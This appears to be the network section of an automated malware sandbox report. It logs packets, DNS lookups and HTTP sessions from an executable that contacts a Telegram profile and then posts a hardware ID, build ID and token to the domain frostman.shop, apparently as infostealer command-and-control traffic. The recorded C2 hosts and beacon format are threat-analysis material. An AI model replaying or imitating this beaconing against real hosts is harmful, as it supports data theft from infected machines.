                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.786398888 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.786432981 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.786504030 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.786725998 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:16.793284893 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.107975006 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.112395048 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.112451077 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.112484932 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.112878084 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.118834019 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.581372976 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:17.581424952 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.228920937 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.238497972 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.583604097 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.589318037 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.589462042 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.589570999 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.589699984 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.595825911 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.911010027 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.916441917 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.916487932 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.916834116 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.916883945 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:23.923486948 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.237865925 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.245109081 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.245125055 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.245249033 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.245687962 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.257428885 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.572220087 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.577008009 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.577294111 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.577323914 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.577358961 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.607028961 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.915862083 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.921487093 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.926728010 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.926747084 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:24.926765919 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.032394886 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.241233110 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.326587915 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.372576952 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.426101923 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.426845074 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.641036987 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.641426086 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.646280050 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.646337032 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.646445990 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.646842003 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.647125006 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.667223930 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.982757092 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.987014055 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.987044096 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.987091064 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.987883091 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:25.997806072 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.314781904 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.320100069 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.320267916 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.320296049 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.322052956 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.348603010 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.357549906 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.660556078 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.672430038 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.678076982 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.678107023 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.678133965 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.678404093 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:26.687529087 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.003891945 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.008594990 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.008697987 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.008725882 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.009035110 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.022630930 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.337264061 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.342248917 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.342279911 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.342314005 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.342595100 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.359606981 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.674235106 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.679582119 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.679713011 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.679742098 CET4435140523.209.72.28192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.679892063 CET51405443192.168.2.723.209.72.28
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:32:27.690252066 CET51405443192.168.2.723.209.72.28
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 20, 2024 07:31:04.953186989 CET | 192.168.2.7 | 1.1.1.1 | 0xcd48 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:07.092207909 CET | 192.168.2.7 | 1.1.1.1 | 0x15b1 | Standard query (0) | frostman.shop | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:22.548209906 CET | 192.168.2.7 | 1.1.1.1 | 0xc30b | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:22.548209906 CET | 192.168.2.7 | 1.1.1.1 | 0x78c3 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:37.007153988 CET | 192.168.2.7 | 1.1.1.1 | 0xd23 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:37.008732080 CET | 192.168.2.7 | 1.1.1.1 | 0xa839 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:39.387473106 CET | 192.168.2.7 | 1.1.1.1 | 0x3d99 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:39.387639046 CET | 192.168.2.7 | 1.1.1.1 | 0xe292 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:40.526773930 CET | 192.168.2.7 | 1.1.1.1 | 0x42c3 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:40.526968002 CET | 192.168.2.7 | 1.1.1.1 | 0x36b | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:41.578581095 CET | 192.168.2.7 | 1.1.1.1 | 0x8dc4 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:41.578893900 CET | 192.168.2.7 | 1.1.1.1 | 0xba06 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:41.579328060 CET | 192.168.2.7 | 1.1.1.1 | 0x9b5 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:41.581454992 CET | 192.168.2.7 | 1.1.1.1 | 0x922e | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:41.598177910 CET | 192.168.2.7 | 1.1.1.1 | 0xb6af | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:41.598669052 CET | 192.168.2.7 | 1.1.1.1 | 0x6150 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.085418940 CET | 192.168.2.7 | 1.1.1.1 | 0x1f85 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.086007118 CET | 192.168.2.7 | 1.1.1.1 | 0xb0ce | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.098591089 CET | 192.168.2.7 | 1.1.1.1 | 0xd6b3 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.098812103 CET | 192.168.2.7 | 1.1.1.1 | 0xd303 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.225064039 CET | 192.168.2.7 | 1.1.1.1 | 0xe975 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.225173950 CET | 192.168.2.7 | 1.1.1.1 | 0xc077 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.365053892 CET | 192.168.2.7 | 1.1.1.1 | 0xfb5a | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 07:31:42.365189075 CET | 192.168.2.7 | 1.1.1.1 | 0x62d6 | Standard query (0) | api.msn.com | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 07:31:05.090451002 CET | 1.1.1.1 | 192.168.2.7 | 0xcd48 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:07.230459929 CET | 1.1.1.1 | 192.168.2.7 | 0x15b1 | No error (0) | frostman.shop | | 116.203.12.114 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:22.685060978 CET | 1.1.1.1 | 192.168.2.7 | 0xc30b | No error (0) | www.google.com | | 172.217.21.36 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:22.685448885 CET | 1.1.1.1 | 192.168.2.7 | 0x78c3 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 20, 2024 07:31:37.143198013 CET | 1.1.1.1 | 192.168.2.7 | 0x4c85 | No error (0) | svc.ha-teams.office.com | mira-tmc.tm-4.office.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:37.144129992 CET | 1.1.1.1 | 192.168.2.7 | 0xd23 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:37.185723066 CET | 1.1.1.1 | 192.168.2.7 | 0xa839 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:37.304406881 CET | 1.1.1.1 | 192.168.2.7 | 0xf4d4 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:37.304406881 CET | 1.1.1.1 | 192.168.2.7 | 0xf4d4 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:37.305577993 CET | 1.1.1.1 | 192.168.2.7 | 0x681 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:39.525255919 CET | 1.1.1.1 | 192.168.2.7 | 0xe292 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:39.525330067 CET | 1.1.1.1 | 192.168.2.7 | 0x3d99 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:40.663450003 CET | 1.1.1.1 | 192.168.2.7 | 0x42c3 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:40.663450003 CET | 1.1.1.1 | 192.168.2.7 | 0x42c3 | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.181.65 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:40.665424109 CET | 1.1.1.1 | 192.168.2.7 | 0x36b | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:41.716483116 CET | 1.1.1.1 | 192.168.2.7 | 0x8dc4 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:41.716483116 CET | 1.1.1.1 | 192.168.2.7 | 0x8dc4 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:41.716944933 CET | 1.1.1.1 | 192.168.2.7 | 0xba06 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 20, 2024 07:31:41.717571020 CET | 1.1.1.1 | 192.168.2.7 | 0x9b5 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:41.717571020 CET | 1.1.1.1 | 192.168.2.7 | 0x9b5 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:41.719456911 CET | 1.1.1.1 | 192.168.2.7 | 0x922e | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 20, 2024 07:31:41.735302925 CET | 1.1.1.1 | 192.168.2.7 | 0xb6af | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:41.735302925 CET | 1.1.1.1 | 192.168.2.7 | 0xb6af | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:41.735332966 CET | 1.1.1.1 | 192.168.2.7 | 0x6150 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 20, 2024 07:31:42.222197056 CET | 1.1.1.1 | 192.168.2.7 | 0x1f85 | No error (0) | sb.scorecardresearch.com | | 18.165.220.110 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:42.222197056 CET | 1.1.1.1 | 192.168.2.7 | 0x1f85 | No error (0) | sb.scorecardresearch.com | | 18.165.220.106 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:42.222197056 CET | 1.1.1.1 | 192.168.2.7 | 0x1f85 | No error (0) | sb.scorecardresearch.com | | 18.165.220.66 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:42.222197056 CET | 1.1.1.1 | 192.168.2.7 | 0x1f85 | No error (0) | sb.scorecardresearch.com | | 18.165.220.57 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 07:31:42.236222982 CET | 1.1.1.1 | 192.168.2.7 | 0xd6b3 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:42.236434937 CET | 1.1.1.1 | 192.168.2.7 | 0xd303 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:42.361879110 CET | 1.1.1.1 | 192.168.2.7 | 0xe975 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:42.362695932 CET | 1.1.1.1 | 192.168.2.7 | 0xc077 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:42.502271891 CET | 1.1.1.1 | 192.168.2.7 | 0x62d6 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:42.502526999 CET | 1.1.1.1 | 192.168.2.7 | 0xfb5a | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:45.155817032 CET | 1.1.1.1 | 192.168.2.7 | 0xbcd8 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 20, 2024 07:31:45.155817032 CET | 1.1.1.1 | 192.168.2.7 | 0xbcd8 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
• t.me
• frostman.shop
• www.google.com
• chrome.cloudflare-dns.com
• clients2.googleusercontent.com
• https:
  • sb.scorecardresearch.com
  • browser.events.data.msn.com
  • c.msn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 149.154.167.99 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:06 UTC | 85 | OUT | GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:07 UTC | 512 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 20 Dec 2024 06:31:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12305
Connection: close
Set-Cookie: stel_ssid=9b20bd88ed4704c2a8_11979302175647296603; expires=Sat, 21 Dec 2024 06:31:06 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-20 06:31:07 UTC | 12305 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49700 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:09 UTC | 233 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49701 | 116.203.12.114 | 443 | 6960 | C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:11 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4OHD2VS26F3EUA1V3790
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:11 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 34 4f 48 44 32 56 53 32 36 46 33 45 55 41 31 56 33 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 46 43 35 38 33 37 35 41 30 43 33 38 38 36 35 38 32 35 34 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 48 44 32 56 53 32 36 46 33 45 55 41 31 56 33 37 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 34 4f 48 44 32 56 53 32 36 46 33 45 55 41 31 56 33 37 39 30 2d 2d 0d
                                                                                                                                                                                                                                                                              Data Ascii: ------4OHD2VS26F3EUA1V3790Content-Disposition: form-data; name="hwid"2EFC58375A0C3886582548-a33c7340-61ca------4OHD2VS26F3EUA1V3790Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------4OHD2VS26F3EUA1V3790--
                                                                                                                                                                                                                                                                              2024-12-20 06:31:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:12 UTC70INData Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 31 7c 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 3b1|1|1|1|4971dbaed128343936d3c1f60719f3d9|1|1|1|0|0|100000|10


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.7  49703        116.203.12.114  443               6960  C:\Users\user\Desktop\pjthjsdjgjrtavv.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-20 06:31:13 UTC  325                OUT        POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----UKX47GDB1DJEUA1NYM79
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:13 UTC  331                OUT        Data Ascii:
------UKX47GDB1DJEUA1NYM79
Content-Disposition: form-data; name="token"

4971dbaed128343936d3c1f60719f3d9
------UKX47GDB1DJEUA1NYM79
Content-Disposition: form-data; name="build_id"

2029121d70cd0f691aa23f374badb32f
------UKX47GDB1DJEUA1NYM79
Cont
2024-12-20 06:31:14 UTC  158                IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:14 UTC  2192               IN         Data Ascii:
884
